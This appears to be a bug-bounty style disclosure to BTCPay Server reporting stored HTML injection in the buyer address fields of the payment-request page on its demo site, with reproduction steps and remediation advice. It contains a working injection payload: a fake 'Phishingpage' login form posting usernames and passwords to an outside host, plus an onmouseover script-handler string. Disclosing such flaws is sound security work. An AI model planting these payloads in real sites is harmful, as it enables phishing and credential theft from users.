I hope you are all doing well.
*. I wanted to bring to your attention a potential vulnerability on the website https://mainnet.demo.btcpayserver.org/stores/6YSiuoN6q1yF2ucWZvWojBuVJAJzXxFFUn9cw8iNPPMC/payment-requests/edit/ec575d56-6b8e-41bd-8b9a-bdcda9c5daad.
*. During my research, I discovered that the five plus fields are vulnerable to a stored HTML injection attack inside the >>> Request payment >>> Request Customer Data Checkout >>> Request shipping address in
https://mainnet.demo.btcpayserver.org/stores/6YSiuoN6q1yF2ucWZvWojBuVJAJzXxFFUn9cw8iNPPMC/payment-requests/edit/ec575d56-6b8e-41bd-8b9a-bdcda9c5daad.
*. I have created a video demonstration of the vulnerability and uploaded it to my Google Drive.
*. The link for the video is provided below for your review:
https://drive.google.com/file/d/1Pn33vZ4TeFovvkK50eVBUGAkeVSfCQf-/view?usp=sharing
*. Go to the website https://mainnet.demo.btcpayserver.org/stores/6YSiuoN6q1yF2ucWZvWojBuVJAJzXxFFUn9cw8iNPPMC/payment-requests
*. Click payment request.
*. Request new payment.
*. Remember to enable the >>> Request customer data on checkout >>> Request shipping address.
*. Create the payment request.
*. Now click view, we/user need to enter the address and other stuff.
*. Use the following HTML payload in the below fields:
buyerName
buyerAddress1
buyerAddress2
buyerCity
buyerZip
buyerState
buyerCountry
<html><body><head><meta content="text/html; charset=utf-8"></meta></head>
<div><form Method="POST" Action="http://www.test.com/">
Phishingpage :<br /><br />Username :<br /> <input name="User" /><br />Password :<br />
<input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
<br /></form></div></body></html>
<input><input"/onmouseover="confirm(1);//βonload=onload><input><innerHTML><img src="https://www.petmd.com/sites/default/files/Acute-Dog-Diarrhea-47066074.jpg" width="1000" height="750" alt="onmouseover=prompt(1);//" /></a></input>
*. Save this information.
*. Now, cancel payment and move on to the payment request and click edit data.
*. Check that request shipping address part were stored and rendered the html injection.
*. Thatβs the issue.
*. Tried both Html/javascript injections, but html injection only worked. Due to your content security policy JS omitted.
*. Restrict special characters and HTML encode attributes in the input fields.
*. Use regular expressions or other techniques to detect and reject malicious input.
*. Avoid embedding user input into emails unless necessary and always HTML-encode user input before embedding it into emails.
*. Implement proper input validation and sanitization measures to prevent this type of vulnerability from occurring in the future.